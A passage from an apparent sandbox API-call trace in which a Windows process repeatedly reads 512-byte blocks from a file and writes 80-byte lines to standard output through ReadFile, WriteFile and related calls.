nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.542] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.543] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] GetFileType (hFile=0x50) returned 0x1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] GetFileType (hFile=0x50) returned 0x1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] GetFileType (hFile=0x50) returned 0x1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] GetFileType (hFile=0x50) returned 0x1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] GetFileType (hFile=0x50) returned 0x1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] GetFileType (hFile=0x50) returned 0x1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] GetFileType (hFile=0x50) returned 0x1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.544] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.544] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.545] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.545] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.546] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.546] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.547] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.547] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.548] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.548] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.549] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.549] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: 